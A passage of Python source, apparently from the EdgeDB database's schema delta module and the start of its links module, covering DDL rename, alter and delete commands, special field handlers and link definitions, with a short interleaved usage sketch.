scls = self.scls
context.renames[self.classname] = self.new_name
context.renamed_objs.add(scls)
vn = scls.get_verbosename(schema)
schema = self._propagate_if_expr_refs(
schema,
context,
action=f'rename {vn}',
fixer=self._fix_referencing_expr,
)
if not context.canonical:
self.set_attribute_value(
'name',
value=self.new_name,
orig_value=self.classname,
)
return super()._alter_begin(schema, context)
def _alter_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical:
self._canonicalize(schema, context, self.scls)
return super()._alter_innards(schema, context)
def init_rename_branch(
self,
ref: so.Object,
new_ref_name: sn.Name,
schema: s_schema.Schema,
context: CommandContext,
) -> Command:
ref_root, ref_alter, _ = ref.init_delta_branch(
schema, context, AlterObject)
ref_alter.add(
ref.init_delta_command(
schema,
RenameObject,
new_name=new_ref_name,
),
)
return ref_root
def _canonicalize(
self,
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> None:
mcls = self.get_schema_metaclass()
for refdict in mcls.get_refdicts():
all_refs = set(
scls.get_field_value(schema, refdict.attr).objects(schema)
)
ref: so.Object
for ref in all_refs:
ref_name = ref.get_name(schema)
quals = list(sn.quals_from_fullname(ref_name))
assert isinstance(self.new_name, sn.QualName)
quals[0] = str(self.new_name)
shortname = sn.shortname_from_fullname(ref_name)
new_ref_name = sn.QualName(
name=sn.get_specialized_name(shortname, *quals),
module=self.new_name.module,
)
self.add(self.init_rename_branch(
ref,
new_ref_name,
schema=schema,
context=context,
))
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
astnode = self._get_ast_node(schema, context)
ref = self._deparse_name(schema, context, self.new_name)
ref.itemclass = None
orig_ref = self._deparse_name(schema, context, self.classname)
# Ha, ha! Do it recursively to force any renames in children!
self._log_all_renames(context)
if (orig_ref.module, orig_ref.name) != (ref.module, ref.name):
return astnode(new_name=ref) # type: ignore
else:
return None
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> RenameObject[so.Object_T]:
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_class = parent_op.get_schema_metaclass()
rename_class = get_object_command_class_or_die(
RenameObject, parent_class)
return rename_class._rename_cmd_from_ast(schema, astnode, context)
@classmethod
def _rename_cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> RenameObject[so.Object_T]:
assert isinstance(astnode, qlast.Rename)
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_class = parent_op.get_schema_metaclass()
rename_class = get_object_command_class_or_die(
RenameObject, parent_class)
new_name = cls._classname_from_ast(schema, astnode, context)
# Populate the early_renames map of the context as we go, since
# in-flight renames will affect the generated names of later
# operations.
context.early_renames[parent_op.classname] = new_name
return rename_class(
classname=parent_op.classname,
new_name=new_name,
)
class AlterObject(AlterObjectOrFragment[so.Object_T], Generic[so.Object_T]):
_delta_action = 'alter'
#: If True, apply the command only if the object exists.
if_exists = struct.Field(bool, default=False)
#: If True, only apply changes to properties, not "real" schema changes
metadata_only = struct.Field(bool, default=False)
def get_verb(self) -> str:
return 'alter'
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, AlterObject)
if getattr(astnode, 'abstract', False):
cmd.set_attribute_value('abstract', True)
return cmd
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
if (node is not None and hasattr(node, 'commands') and
not node.commands):
# Alter node without subcommands. Occurs when all
# subcommands have been filtered out of DDL stream,
# so filter it out as well.
node = None
return node
def canonicalize_alter_from_external_ref(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
"""Canonicalize an ALTER command triggered by a modification of a
an object referred to by an expression in this object."""
pass
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.if_exists:
scls = self.get_object(schema, context, default=None)
if scls is None:
context.current().op.discard(self)
return schema
else:
scls = self.get_object(schema, context)
self.scls = scls
with self.new_context(schema, context, scls):
schema = self._alter_begin(schema, context)
schema = self._alter_innards(schema, context)
schema = self._alter_finalize(schema, context)
return schema
class DeleteObject(ObjectCommand[so.Object_T], Generic[so.Object_T]):
_delta_action = 'delete'
#: If True, apply the command only if the object exists.
if_exists = struct.Field(bool, default=False)
#: If True, apply the command only if the object has no referrers
#: in the schema.
if_unused = struct.Field(bool, default=False)
def get_verb(self) -> str:
return 'drop'
def is_data_safe(self) -> bool:
# Deletions are only safe if the entire object class
# has been declared as data-safe.
return self.get_schema_metaclass()._data_safe
def _delete_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
from . import ordering
self._validate_legal_command(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
if not context.get_value(('delcanon', self)):
commands = self._canonicalize(schema, context, self.scls)
root = DeltaRoot()
root.update(commands)
root = ordering.linearize_delta(root, schema, schema)
self.update(root.get_subcommands())
return schema
def _canonicalize(
self,
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> List[Command]:
mcls = self.get_schema_metaclass()
commands: List[Command] = []
for refdict in mcls.get_refdicts():
deleted_refs = set()
all_refs = set(
scls.get_field_value(schema, refdict.attr).objects(schema)
)
refcmds = cast(
Tuple[ObjectCommand[so.Object], ...],
self.get_subcommands(metaclass=refdict.ref_cls),
)
for op in refcmds:
deleted_ref: so.Object = schema.get(op.classname)
deleted_refs.add(deleted_ref)
# Add implicit Delete commands for any local refs not
# deleted explicitly.
for ref in all_refs - deleted_refs:
op = ref.init_delta_command(schema, DeleteObject)
assert isinstance(op, DeleteObject)
subcmds = op._canonicalize(schema, context, ref)
op.update(subcmds)
commands.append(op)
# Record the fact that DeleteObject._canonicalize
# was called on this object to guard against possible
# duplicate calls.
context.store_value(('delcanon', self), True)
return commands
def _delete_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(metaclass=so.Object):
schema = op.apply(schema, context=context)
return schema
def _delete_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
ref_strs = []
if not context.canonical and not context.disable_dep_verification:
refs = schema.get_referrers(self.scls)
ctx = context.current()
assert ctx is not None
orig_schema = ctx.original_schema
if refs:
for ref in refs:
if (not context.is_deleting(ref)
and ref.is_blocking_ref(orig_schema, self.scls)):
ref_strs.append(
ref.get_verbosename(orig_schema, with_parent=True))
if ref_strs:
vn = self.scls.get_verbosename(orig_schema, with_parent=True)
dn = self.scls.get_displayname(orig_schema)
detail = '; '.join(f'{ref_str} depends on {dn}'
for ref_str in ref_strs)
raise errors.SchemaError(
f'cannot drop {vn} because '
f'other objects in the schema depend on it',
details=detail,
)
schema = schema.delete(self.scls)
return schema
def _has_outside_references(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> bool:
# Check if the subject of this command has any outside references
# minus any current expiring refs and minus structural child refs
# (e.g. source backref in pointers of an object type).
refs = [
ref
for ref in schema.get_referrers(self.scls)
if not ref.is_parent_ref(schema, self.scls)
and not context.is_deleting(ref)
]
return bool(refs)
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if self.if_exists:
scls = self.get_object(schema, context, default=None)
if scls is None:
context.current().op.discard(self)
return schema
else:
scls = self.get_object(schema, context)
self.scls = scls
with self.new_context(schema, context, scls):
if (
not self.canonical
and self.if_unused
and self._has_outside_references(schema, context)
):
parent_ctx = context.parent()
if parent_ctx is not None:
parent_ctx.op.discard(self)
return schema
schema = self._delete_begin(schema, context)
schema = self._delete_innards(schema, context)
schema = self._delete_finalize(schema, context)
return schema
class DeleteExternalObject(
DeleteObject[so.ExternalObject_T],
ExternalObjectCommand[so.ExternalObject_T],
):
def _delete_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def _delete_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(metaclass=so.Object):
schema = op.apply(schema, context=context)
return schema
def _delete_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self.scls = _dummy_object # type: ignore
with self.new_context(schema, context, self.scls):
schema = self._delete_begin(schema, context)
schema = self._delete_innards(schema, context)
schema = self._delete_finalize(schema, context)
return schema
special_field_alter_handlers: Dict[
str,
Dict[Type[so.Object], Type[AlterSpecialObjectField[so.Object]]],
] = {}
class AlterSpecialObjectField(AlterObjectFragment[so.Object_T]):
"""Base class for AlterObjectFragment implementations for special fields.
When the generic `AlterObjectProperty` handling of field value transitions
is insufficient, declare a subclass of this to implement custom handling.
"""
_field: ClassVar[str]
def __init_subclass__(
cls,
*,
field: Optional[str] = None,
**kwargs: Any,
) -> None:
super().__init_subclass__(**kwargs)
if field is None:
if any(
issubclass(b, AlterSpecialObjectField)
for b in cls.__mro__[1:]
):
return
else:
raise TypeError(
"AlterSpecialObjectField.__init_subclass__() missing "
"1 required keyword-only argument: 'field'"
)
handlers = special_field_alter_handlers.get(field)
if handlers is None:
handlers = special_field_alter_handlers[field] = {}
schema_metaclass = cls.get_schema_metaclass()
handlers[schema_metaclass] = cls # type: ignore
cls._field = field
def clone(self, name: sn.Name) -> AlterSpecialObjectField[so.Object_T]:
return struct.Struct.replace(self, classname=name)
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> ObjectCommand[so.Object_T]:
this_op = context.current().op
assert isinstance(this_op, ObjectCommand)
return cls(classname=this_op.classname)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
assert isinstance(astnode, qlast.SetField)
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
cmd.add(AlterObjectProperty.regular_cmd_from_ast(
schema, astnode, context))
return cmd
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
attrs = self._enumerate_attribute_cmds()
assert len(attrs) == 1, "expected one attribute command"
return attrs[0]._get_ast(schema, context, parent_node=parent_node)
def get_verb(self) -> str:
return f'alter the {self._field} of'
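# Illustrative sketch (hypothetical, not part of the original module): a
# handler for a made-up ``colour`` field on a made-up ``Widget`` metaclass.
# The __init_subclass__ hook above records the subclass in
# ``special_field_alter_handlers`` keyed by (field name, schema metaclass),
# and AlterObjectProperty._cmd_tree_from_ast dispatches to it instead of the
# generic SetField handling.  SetLinkType in edb/schema/links.py below is a
# real instance of this pattern, declared with ``field='target'``.
#
#     class AlterWidgetColour(
#         AlterSpecialObjectField[Widget],
#         field='colour',
#     ):
#         def _alter_begin(self, schema, context):
#             # custom validation of the colour transition would go here
#             return super()._alter_begin(schema, context)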
def get_special_field_alter_handler(
field: str,
schema_cls: Type[so.Object],
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
of an AlterObject operation, and a special handler has been declared.
"""
field_handlers = special_field_alter_handlers.get(field)
if field_handlers is None:
return None
return field_handlers.get(schema_cls)
def get_special_field_create_handler(
field: str,
schema_cls: Type[so.Object],
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
    of a CreateObject operation, and a special handler has been declared.
For now this is just a hacky special case:
the 'required' field of Pointers. If that changes, we should generalize
the mechanism.
"""
if field != 'required':
return None
return get_special_field_alter_handler(field, schema_cls)
def get_special_field_alter_handler_for_context(
field: str,
context: CommandContext,
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
of an AlterObject operation, and a special handler has been declared.
"""
this_op = context.current().op
if (
isinstance(this_op, AlterObjectOrFragment)
and not isinstance(this_op, AlterSpecialObjectField)
):
mcls = this_op.get_schema_metaclass()
return get_special_field_alter_handler(field, mcls)
elif isinstance(this_op, CreateObject):
mcls = this_op.get_schema_metaclass()
return get_special_field_create_handler(field, mcls)
else:
return None
class AlterObjectProperty(Command):
astnode = qlast.SetField
property = struct.Field(str)
old_value = struct.Field[Any](object, default=None)
new_value = struct.Field[Any](object, default=None)
old_inherited = struct.Field(bool, default=False)
new_inherited = struct.Field(bool, default=False)
new_computed = struct.Field(bool, default=False)
old_computed = struct.Field(bool, default=False)
from_default = struct.Field(bool, default=False)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
assert isinstance(astnode, qlast.SetField)
handler = get_special_field_alter_handler_for_context(
astnode.name, context)
if handler is not None:
return handler._cmd_tree_from_ast(schema, astnode, context)
else:
return cls.regular_cmd_from_ast(schema, astnode, context)
@classmethod
def regular_cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.SetField,
context: CommandContext,
) -> Command:
propname = astnode.name
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_cls = parent_op.get_schema_metaclass()
if (
propname.startswith('orig_')
and context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 8)
)
and not parent_cls.has_field(propname)
):
return Nop()
else:
try:
field = parent_cls.get_field(propname)
except LookupError:
raise errors.SchemaDefinitionError(
f'{propname!r} is not a valid field',
context=astnode.context)
if not (
astnode.special_syntax
or field.allow_ddl_set
or context.stdmode
or context.testmode
):
raise errors.SchemaDefinitionError(
f'{propname!r} is not a valid field',
context=astnode.context)
if field.name == 'id' and not isinstance(parent_op, CreateObject):
raise errors.SchemaDefinitionError(
f'cannot alter object id',
context=astnode.context)
new_value: Any
if field.type is s_expr.Expression:
if astnode.value is None:
new_value = None
else:
orig_text = cls.get_orig_expr_text(
schema, parent_op.qlast, field.name)
if (
orig_text is not None
and context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 6)
)
):
# Versions prior to a6 used a different expression
# normalization strategy, so we must renormalize the
# expression.
expr_ql = qlcompiler.renormalize_compat(
astnode.value,
orig_text,
schema=schema,
localnames=context.localnames,
)
else:
expr_ql = astnode.value
new_value = s_expr.Expression.from_ast(
expr_ql,
schema,
context.modaliases,
context.localnames,
)
else:
if isinstance(astnode.value, qlast.Tuple):
new_value = tuple(
qlcompiler.evaluate_ast_to_python_val(
el, schema=schema)
for el in astnode.value.elements
)
elif isinstance(astnode.value, qlast.ObjectRef):
new_value = utils.ast_to_object_shell(
astnode.value,
metaclass=so.Object,
modaliases=context.modaliases,
schema=schema,
)
elif (
isinstance(astnode.value, qlast.Set)
and not astnode.value.elements
):
# empty set
new_value = None
elif isinstance(astnode.value, qlast.TypeExpr):
from . import types as s_types
if not isinstance(parent_op, QualifiedObjectCommand):
raise AssertionError(
'cannot determine module for derived compound type: '
'parent operation is not a QualifiedObjectCommand'
)
new_value = utils.ast_to_type_shell(
astnode.value,
metaclass=s_types.Type,
module=parent_op.classname.module,
modaliases=context.modaliases,
schema=schema,
)
else:
new_value = qlcompiler.evaluate_ast_to_python_val(
astnode.value, schema=schema) if astnode.value else None
if new_value is not None:
new_value = field.coerce_value(schema, new_value)
return cls(
property=propname,
new_value=new_value,
source_context=astnode.context,
)
def is_data_safe(self) -> bool:
# Field alterations on existing schema objects
# generally represent semantic changes and are
# reversible. Non-safe field alters are normally
# represented by a dedicated subcommand, such as
# SetLinkType.
return True
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
value = self.new_value
new_value_empty = \
(value is None or
(isinstance(value, collections.abc.Container) and not value))
old_value_empty = \
(self.old_value is None or
(isinstance(self.old_value, collections.abc.Container)
and not self.old_value))
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
assert parent_node is not None
parent_cls = parent_op.get_schema_metaclass()
field = parent_cls.get_field(self.property)
if field is None:
raise errors.SchemaDefinitionError(
f'{self.property!r} is not a valid field',
context=self.source_context)
if self.property == 'id':
return None
parent_node_attr = parent_op.get_ast_attr_for_field(
field.name, type(parent_node))
if (
not field.allow_ddl_set
and not (
field.special_ddl_syntax
and isinstance(parent_node, qlast.AlterObject)
)
and self.property != 'expr'
and parent_node_attr is None
):
# Don't produce any AST if:
#
# * a field does not have the "allow_ddl_set" option, unless
# it's an 'expr' field.
#
# 'expr' fields come from the "USING" clause and are specially
# treated in parser and codegen.
return None
if (
(
self.new_inherited
and not self.old_inherited
and not old_value_empty
) or (
self.new_computed
and not self.old_computed
and not self.old_inherited
and not old_value_empty
)
):
# The field became inherited or computed, in which case we should
# generate a RESET.
return qlast.SetField(
name=self.property,
value=None,
special_syntax=field.special_ddl_syntax,
)
if self.new_inherited or self.new_computed:
# We don't want to show inherited or computed properties unless
# we are in "descriptive_mode" ...
if not context.descriptive_mode:
return None
if not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DERIVED
):
# ... or if the field shouldn't be shown when inherited
# or computed.
return None
if (
not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DEFAULT
) and field.default == value
):
# ... or if the field should not be shown when the value
            # matches the default.
return None
parentop_sn = sn.shortname_from_fullname(parent_op.classname).name
if self.property == 'default' and parentop_sn == 'id':
# ... or if it's 'default' for the 'id' property
# (special case).
return None
if self.from_default:
if not context.descriptive_mode:
return None
if not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DEFAULT
):
# ... or if the field should not be shown when the value
                # matches the default.
return None
if new_value_empty:
if old_value_empty:
return None
else:
value = None
elif issubclass(field.type, s_expr.Expression):
return self._get_expr_field_ast(
schema,
context,
parent_op=parent_op,
field=field,
parent_node=parent_node,
parent_node_attr=parent_node_attr,
)
elif parent_node_attr is not None:
setattr(parent_node, parent_node_attr, value)
return None
elif (v := utils.is_nontrivial_container(value)) and v is not None:
value = qlast.Tuple(elements=[
utils.const_ast_from_python(el) for el in v
])
elif isinstance(value, uuid.UUID):
value = qlast.TypeCast(
expr=qlast.StringConstant.from_python(str(value)),
type=qlast.TypeName(
maintype=qlast.ObjectRef(
name='uuid',
module='std',
)
)
)
elif isinstance(value, so.ObjectShell):
value = utils.shell_to_ast(schema, value)
else:
value = utils.const_ast_from_python(value)
return qlast.SetField(
name=self.property,
value=value,
special_syntax=field.special_ddl_syntax,
)
def _get_expr_field_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_op: ObjectCommand[so.Object],
field: so.Field[Any],
parent_node: qlast.DDLOperation,
parent_node_attr: Optional[str],
) -> Optional[qlast.DDLOperation]:
from edb import edgeql
assert isinstance(
self.new_value,
(s_expr.Expression, s_expr.ExpressionShell),
)
expr_ql = edgeql.parse_fragment(self.new_value.text)
if parent_node is not None and parent_node_attr is not None:
setattr(parent_node, parent_node_attr, expr_ql)
return None
else:
return qlast.SetField(
name=self.property,
value=expr_ql,
special_syntax=(self.property == 'expr'),
)
def __repr__(self) -> str:
return '<%s.%s "%s":"%s"->"%s">' % (
self.__class__.__module__, self.__class__.__name__,
self.property, self.old_value, self.new_value)
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
if parent_op is not None:
assert isinstance(parent_op, ObjectCommand)
object_desc = parent_op.get_friendly_object_name_for_description(
schema=schema,
object=object,
object_desc=object_desc,
)
return f'alter the {self.property} of {object_desc}'
else:
return f'alter the {self.property} of schema object'
def compile_ddl(
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
*,
context: Optional[CommandContext]=None,
) -> Command:
if context is None:
context = CommandContext()
astnode_type = type(astnode)
primary_cmdcls = CommandMeta._astnode_map.get(astnode_type)
if primary_cmdcls is None:
for astnode_type_base in astnode_type.__mro__[1:]:
primary_cmdcls = CommandMeta._astnode_map.get(astnode_type_base)
if primary_cmdcls is not None:
break
else:
raise AssertionError(
f'no delta command class for AST node {astnode!r}')
cmdcls = primary_cmdcls.command_for_ast_node(astnode, schema, context)
context_class = cmdcls.get_context_class()
if context_class is not None:
modaliases = cmdcls._modaliases_from_ast(schema, astnode, context)
localnames = cmdcls.localnames_from_ast(schema, astnode, context)
ctxcls = cast(
Type[ObjectCommandContext[so.Object]],
context_class,
)
ctx = ctxcls(
schema,
op=cast(ObjectCommand[so.Object], _dummy_command),
scls=_dummy_object,
modaliases=modaliases,
localnames=localnames,
)
with context(ctx):
cmd = cmdcls._cmd_tree_from_ast(schema, astnode, context)
else:
cmd = cmdcls._cmd_tree_from_ast(schema, astnode, context)
return cmd
def get_object_delta_command(
*,
objtype: Type[so.Object_T],
cmdtype: Type[ObjectCommand_T],
schema: s_schema.Schema,
name: sn.Name,
ddl_identity: Optional[Mapping[str, Any]] = None,
**kwargs: Any,
) -> ObjectCommand_T:
cmdcls = cast(
Type[ObjectCommand_T],
get_object_command_class_or_die(cmdtype, objtype),
)
return cmdcls(
classname=name,
ddl_identity=dict(ddl_identity) if ddl_identity is not None else None,
**kwargs,
)
def get_object_command_id(delta: ObjectCommand[Any]) -> str:
quoted_name: str
if isinstance(delta.classname, sn.QualName):
quoted_module = qlquote.quote_ident(delta.classname.module)
quoted_nqname = qlquote.quote_ident(delta.classname.name)
quoted_name = f'{quoted_module}::{quoted_nqname}'
else:
quoted_name = qlquote.quote_ident(str(delta.classname))
if delta.orig_cmd_type is not None:
cmdtype = delta.orig_cmd_type
else:
cmdtype = type(delta)
qlcls = delta.get_schema_metaclass().get_ql_class_or_die()
return f'{cmdtype.__name__} {qlcls} {quoted_name}'
def apply(
delta: Command,
*,
schema: s_schema.Schema,
context: Optional[CommandContext] = None,
) -> s_schema.Schema:
if context is None:
context = CommandContext()
if not isinstance(delta, DeltaRoot):
root = DeltaRoot()
root.add(delta)
else:
root = delta
return root.apply(schema, context)
```
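The module-level `compile_ddl` and `apply` helpers defined at the end of this file are the generic entry points for turning parsed DDL AST nodes into schema mutations. A minimal sketch of how they compose, hedged: `apply_ddl_text` is a hypothetical helper written only for illustration, and it assumes an already-populated schema object (such as the one built by `_load_std_schema` in `edb/testbase/lang.py` below).

```python
from edb import edgeql
from edb.schema import delta as sd
from edb.schema import schema as s_schema


def apply_ddl_text(schema: s_schema.Schema, ddl_text: str) -> s_schema.Schema:
    """Parse a DDL block and apply each statement to the schema in order."""
    for astnode in edgeql.parse_block(ddl_text):
        context = sd.CommandContext()
        # compile_ddl() resolves the AST node to the appropriate
        # ObjectCommand subclass and builds the delta command tree.
        cmd = sd.compile_ddl(schema, astnode, context=context)
        # apply() wraps the command in a DeltaRoot when needed and
        # returns the mutated schema.
        schema = sd.apply(cmd, schema=schema, context=context)
    return schema
```

Each statement gets a fresh `CommandContext` in this sketch; real callers typically configure the context (modaliases, stdmode, testmode) before compiling.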
#### File: edb/schema/links.py
```python
from __future__ import annotations
from typing import *
from edb.edgeql import ast as qlast
from edb.edgeql import qltypes
from edb import errors
from . import abc as s_abc
from . import constraints
from . import delta as sd
from . import indexes
from . import inheriting
from . import properties
from . import name as sn
from . import objects as so
from . import pointers
from . import referencing
from . import sources
from . import utils
if TYPE_CHECKING:
from . import objtypes as s_objtypes
from . import types as s_types
from . import schema as s_schema
LinkTargetDeleteAction = qltypes.LinkTargetDeleteAction
def merge_actions(
target: so.InheritingObject,
sources: List[so.Object],
field_name: str,
*,
ignore_local: bool = False,
schema: s_schema.Schema,
) -> Any:
if not ignore_local:
ours = target.get_explicit_local_field_value(schema, field_name, None)
else:
ours = None
if ours is None:
current = None
current_from = None
for source in sources:
theirs = source.get_explicit_field_value(schema, field_name, None)
if theirs is not None:
if current is None:
current = theirs
current_from = source
elif current != theirs:
target_source = target.get_source(schema)
current_from_source = current_from.get_source(schema)
source_source = source.get_source(schema)
tgt_repr = (
f'{target_source.get_displayname(schema)}.'
f'{target.get_displayname(schema)}'
)
cf_repr = (
f'{current_from_source.get_displayname(schema)}.'
f'{current_from.get_displayname(schema)}'
)
other_repr = (
f'{source_source.get_displayname(schema)}.'
f'{source.get_displayname(schema)}'
)
raise errors.SchemaError(
f'cannot implicitly resolve the '
f'`on target delete` action for '
f'{tgt_repr!r}: it is defined as {current} in '
f'{cf_repr!r} and as {theirs} in {other_repr!r}; '
f'to resolve, declare `on target delete` '
f'explicitly on {tgt_repr!r}'
)
return current
else:
return ours
class Link(
sources.Source,
pointers.Pointer,
s_abc.Link,
qlkind=qltypes.SchemaObjectClass.LINK,
data_safe=False,
):
on_target_delete = so.SchemaField(
LinkTargetDeleteAction,
default=LinkTargetDeleteAction.Restrict,
coerce=True,
compcoef=0.9,
merge_fn=merge_actions)
def get_target(self, schema: s_schema.Schema) -> s_objtypes.ObjectType:
return self.get_field_value( # type: ignore[no-any-return]
schema, 'target')
def is_link_property(self, schema: s_schema.Schema) -> bool:
return False
def is_property(self, schema: s_schema.Schema) -> bool:
return False
def scalar(self) -> bool:
return False
def has_user_defined_properties(self, schema: s_schema.Schema) -> bool:
return bool([p for p in self.get_pointers(schema).objects(schema)
if not p.is_special_pointer(schema)])
def get_source_type(
self,
schema: s_schema.Schema
) -> s_types.Type:
from . import types as s_types
source = self.get_source(schema)
assert isinstance(source, s_types.Type)
return source
def compare(
self,
other: so.Object,
*,
our_schema: s_schema.Schema,
their_schema: s_schema.Schema,
context: so.ComparisonContext,
) -> float:
if not isinstance(other, Link):
if isinstance(other, pointers.Pointer):
return 0.0
else:
raise NotImplementedError()
return super().compare(
other, our_schema=our_schema,
their_schema=their_schema, context=context)
def set_target(
self,
schema: s_schema.Schema,
target: s_types.Type,
) -> s_schema.Schema:
schema = super().set_target(schema, target)
tgt_prop = self.getptr(schema, sn.UnqualName('target'))
schema = tgt_prop.set_target(schema, target)
return schema
@classmethod
def get_root_classes(cls) -> Tuple[sn.QualName, ...]:
return (
sn.QualName(module='std', name='link'),
sn.QualName(module='schema', name='__type__'),
)
@classmethod
    def get_default_base_name(cls) -> sn.QualName:
return sn.QualName('std', 'link')
class LinkSourceCommandContext(sources.SourceCommandContext):
pass
class LinkSourceCommand(inheriting.InheritingObjectCommand[sources.Source_T]):
pass
class LinkCommandContext(pointers.PointerCommandContext[Link],
constraints.ConsistencySubjectCommandContext,
properties.PropertySourceContext,
indexes.IndexSourceCommandContext):
pass
class LinkCommand(
properties.PropertySourceCommand[Link],
pointers.PointerCommand[Link],
context_class=LinkCommandContext,
referrer_context_class=LinkSourceCommandContext,
):
def _append_subcmd_ast(
self,
schema: s_schema.Schema,
node: qlast.DDLOperation,
subcmd: sd.Command,
context: sd.CommandContext,
) -> None:
if (
isinstance(subcmd, pointers.PointerCommand)
and subcmd.classname != self.classname
):
pname = sn.shortname_from_fullname(subcmd.classname)
if pname.name in {'source', 'target'}:
return
super()._append_subcmd_ast(schema, node, subcmd, context)
def validate_object(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> None:
"""Check that link definition is sound."""
super().validate_object(schema, context)
scls = self.scls
assert isinstance(scls, Link)
if not scls.get_owned(schema):
return
target = scls.get_target(schema)
assert target is not None
if not target.is_object_type():
srcctx = self.get_attribute_source_context('target')
raise errors.InvalidLinkTargetError(
f'invalid link target, expected object type, got '
f'{target.get_schema_class_displayname()}',
context=srcctx,
)
if (
not scls.is_pure_computable(schema)
and not scls.get_from_alias(schema)
and target.is_view(schema)
):
srcctx = self.get_attribute_source_context('target')
raise errors.InvalidLinkTargetError(
f'invalid link type: {target.get_displayname(schema)!r}'
f' is an expression alias, not a proper object type',
context=srcctx,
)
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
# __type__ link is special, and while it exists on every object
# it does not have a defined default in the schema (and therefore
# it isn't marked as required.) We intervene here to mark all
# __type__ links required when rendering for SDL/TEXT.
if context.declarative and node is not None:
assert isinstance(node, (qlast.CreateConcreteLink,
qlast.CreateLink))
if node.name.name == '__type__':
assert isinstance(node, qlast.CreateConcretePointer)
node.is_required = True
return node
def _reinherit_classref_dict(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
) -> Tuple[s_schema.Schema,
Dict[sn.Name, Type[sd.ObjectCommand[so.Object]]]]:
if self.scls.get_computable(schema) and refdict.attr != 'pointers':
# If the link is a computable, the inheritance would only
# happen in the case of aliasing, and in that case we only
# need to inherit the link properties and nothing else.
return schema, {}
return super()._reinherit_classref_dict(schema, context, refdict)
class CreateLink(
pointers.CreatePointer[Link],
LinkCommand,
):
astnode = [qlast.CreateConcreteLink, qlast.CreateLink]
referenced_astnode = qlast.CreateConcreteLink
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, qlast.CreateConcreteLink):
assert isinstance(cmd, pointers.PointerCommand)
cmd._process_create_or_alter_ast(schema, astnode, context)
else:
            # this is an abstract link then
